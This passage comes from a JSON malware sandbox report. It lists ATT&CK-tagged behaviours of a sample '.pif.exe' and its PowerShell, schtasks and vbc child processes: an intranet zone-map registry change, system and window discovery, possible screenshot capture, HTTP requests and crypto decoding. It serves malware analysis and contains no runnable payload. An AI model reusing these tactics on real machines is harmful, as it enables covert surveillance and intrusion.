"registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"powershell.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000028852b006cf66700145c4477435c447738f76700010000009401290001000000ecf56700935c457740834c77d4a0447785981f7738f767000100000001000000d0bb2b0000000000bcf56700ecf5670058f6670095e1407791693c00feffffffd4a044771bbe58750000b97500000000 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100372c2c4973576f77363450726f636573732c6b65726e656c33322e646c6c2c223235323a34333a32342e383033222c52583d302c50583d30003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f5f64477fd875977f42eaf71d0cc2b00a035af710d875977bcea2100786a2b00b2f444771d875977ccea21000000a8710000a8710000000028ea2100f0000000f000a8710000000038ea210053000000cceb210000000000010000009cea210040f54477000000000000000088ea2100 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007f02000000000000008c47dc7388f032008c47dc730000000088f0320084e02100086d447718814c770000000038e1210000000000de54f868c4e0210095e14077a97c3c00feffffff6b2c45773119597502100000000000000000010098e02100c89f44778c47dc730000000000000000 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb7375500a35000070fd7f9a5c45770080fd7f58c5dc054470fd7f00000000400000003f0000002a0000000070fd7f4cc5dc05c15c457760824c772a0000000070fd7f9a5c45770080fd7f70c5dc055789447780834c7713175975d8eb7375 (UID: 00000000-00002912)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000024000000020000000000000000000000e21920001100000000000000000000002200000000000000000000001d00001dc0a2000058482000c0b91e0044006100740061005c004c006f00630061006c005c00500072006f006700720061006d0073005c0050007900740068006f006e00 (UID: 00000000-00004784)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000195e14077bfad3d00fefffffff5f64477634d4577b07c1e001015027288080200b2f44477534902765cec7b010000017200000172804d457777490276f0000000f000017200000000c8eb7b015c0043005ced7b0100000000010000002cec7b0140f54477000000000000000018ec7b01 (UID: 00000000-00004784)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000000000008800000000000000c8eb7b01459dc0760000100000000000800000000200000000007c01dc1a0172dceb7b01 (UID: 00000000-00004784)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004784)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb7375306a68040050fd7f9a5c457700f0fa7f90d31b054450fd7f00000000400000003f000000250000000050fd7f84d31b05c15c457760824c77250000000050fd7f9a5c457700f0fa7fa8d31b055789447780834c7713175975d8eb7375 (UID: 00000000-00004784)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000024000000020000000000000000000000dafd0e001100000000000000000000002200000000000000000000001d00001d3a770000502c0f0058f90d0044006100740061005c004c006f00630061006c005c00500072006f006700720061006d0073005c0050007900740068006f006e00 (UID: 00000000-00004640)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000195e1407725b93d00fefffffff5f64477634d4577687f0d001015027288080200b2f44477695c1676fced6f010000017200000172804d45770d5c1676f0000000f00001720000000068ed6f015c004300fcee6f010000000001000000cced6f0140f544770000000000000000b8ed6f01 (UID: 00000000-00004640)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000000000000880000000000000068ed6f01459dc0760000640000000000800000000200000000007001dc1a01727ced6f01 (UID: 00000000-00004640)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004640)\n \"powershell.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb737538c36b040070fd7f9a5c457700f0fa7f10d115054470fd7f00000000400000003f000000250000000070fd7f04d11505c15c457760824c77250000000070fd7f9a5c457700f0fa7f28d115055789447780834c7713175975d8eb7375 (UID: 00000000-00004640)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"GetLocaleInfoW\" with parameter \"9\" - (UID: 00000000-00002912)\n \"powershell.exe\" called \"GetLocaleInfoW\" with parameter \"9\" - (UID: 00000000-00004784)\n \"powershell.exe\" called \"GetLocaleInfoW\" with parameter \"9\" - (UID: 00000000-00004640)\n \"vbc.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004880)\n \"vbc.exe\" called \"GetLocaleInfoA\" with parameter \"2048\" - (UID: 00000000-00004880)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"OpenMutexW\" with parameter \"PDocjnzeoflPbxzNZeuIVzsdIQG\" - (UID: 00000000-00002912)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" queries volume information of \"C:\\PCGB2GtVYuBR0mw.pif.exe\" at 00000000-00002912-0000010C-3874840", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002912)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000a7001d020000000000000000000000000000000000001200a2001d0200000000000000000000a06b29000000000020000000000000000000000018492b0090682900b069290068982b00586d290000000000fcf367000000000058f6670095e1407779713c00feffffffff2b44779a2a447764c5be75b69f4477000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c5be7568982b0064c5be75 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000142c2900000000008504000000000000702b29001904000098f82c000000000099040000000000008000000000000000000000000000000000000000000000000200000268952c00ea2000ca000000000000000000000000ff07000000000000ea2000ca98f82c000100000000000000020000000c000000d0cf2c00d0cf2c00cbcf2c000000000000000000000029000000000114f221000000000034f8210095e14077417f3c00feffffff435c44775059447794000000a0000000cacf2c00c8cf2c0094000000b8f32100fdfed8751800000064f1dc9bc386f771e8042100 (UID: 00000000-00002912)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"IsWow64Process\" with parameter \"2912\" - (UID: 00000000-00002912)\n \"powershell.exe\" called \"IsWow64Process\" with parameter \"4784\" - (UID: 00000000-00004784)\n \"powershell.exe\" called \"IsWow64Process\" with parameter \"4640\" - (UID: 00000000-00004640)\n \"schtasks.exe\" called \"IsWow64Process\" with parameter \"4424\" - (UID: 00000000-00004424)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"GetForegroundWindow\" (UID: 00000000-00002912)\n \"vbc.exe\" called \"GetForegroundWindow\" (UID: 00000000-00004880)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00002912)\n \"powershell.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004784)\n \"powershell.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004640)\n \"schtasks.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004424)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\POWERSHELL.EXE\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\POWERSHELL.EXE\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\POWERSHELL.EXE\"; Key: \"APPENDPATH\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\POWERSHELL.EXE\"; Key: \"PATH\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SCHTASKS.EXE\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SCHTASKS.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"powershell.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"vbc.exe\" called \"GetWindowTextW\" (UID: 00000000-00004880)\n \"vbc.exe\" called \"GetWindowTextW\" with parameter \"Task Switching\" - (UID: 00000000-00004880)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"powershell.exe\" called \"EnumWindows\" with parameter \"0\" - (UID: 00000000-00004784)\n \"powershell.exe\" called \"EnumWindows\" with parameter \"0\" - (UID: 00000000-00004640)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\Microsoft.NET\\Framework\\\\* (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter NETFXSBS10.exe (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter netfxsbs12.hkf (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbscmp10.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbscmp20_mscorwks.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbscmp20_perfcounter.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbs_diasymreader.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbs_iehost.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.jscript.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbs_microsoft.vsa.vb.codedomprocessor.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbs_mscordbi.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbs_mscorrc.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbs_mscorsec.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbs_system.configuration.install.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbs_system.data.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbs_system.enterpriseservices.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbs_VsaVb7rt.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter sbs_wminet_utils.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter SharedReg12.dll (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter v1.0.3705 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter v1.1.4322 (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"FindNextFileW\" with parameter v2.0.50727 (UID: 00000000-00002912)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-255", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve user names for specified SIDs", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"LsaLookupSids\" with parameters {\"PolicyHandle\": \"337200\"\n \"Count\": \"1\"}", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"805374727\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"2365656446\"\n \"cx\": \"1\"\n \"cy\": \"1\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"powershell.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"powershell.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"schtasks.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "registry-106", "type": 3, "relevance": 3, "name": "Read system defined device setup information from registry", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CLASS\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0002\"; Key: \"PRUNINGMODE\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00002912)\n \"powershell.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004784)\n \"powershell.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004640)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-190", "type": 6, "relevance": 2, "name": "Calls an API typically used to send the specified request to the HTTP server", "description": "\"powershell.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"46a2a48\"\n \"lpszHeaders\": \"If-None-Match: \\\"06cfcc54d47db1:0\\\"If-Modified-Since: Thu, 05 Dec 2024 19:42:09 GMT\"\n \"dwHeadersLength\": \"4294967295\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"}\n \"powershell.exe\" called \"WinHttpSendRequest\" with parameters {\"hRequest\": \"46c1e60\"\n \"lpszHeaders\": \"If-None-Match: \\\"084627641cfd61:0\\\"If-Modified-Since: Thu, 10 Dec 2020 22:11:52 GMT\"\n \"dwHeadersLength\": \"4294967295\"\n \"dwOptionalLength\": \"0\"\n \"dwTotalLength\": \"0\"\n \"dwContext\": \"0\"}", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-191", "type": 6, "relevance": 2, "name": "Calls an API typically used to to receive the response to a HTTP requests", "description": "\"powershell.exe\" called \"WinHttpReceiveResponse\" with parameters {\"hRequest\": \"46a2a48\"\n \"lpReserved\": \"0\"}\n \"powershell.exe\" called \"WinHttpReceiveResponse\" with parameters {\"hRequest\": \"46c1e60\"\n \"lpReserved\": \"0\"}", "origin": "API Call", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "api-229", "type": 6, "relevance": 3, "name": "Calls an API typically used to convert data from string to binary", "description": "\"powershell.exe\" called \"CryptStringToBinaryA\" with parameters {\"pszString\": 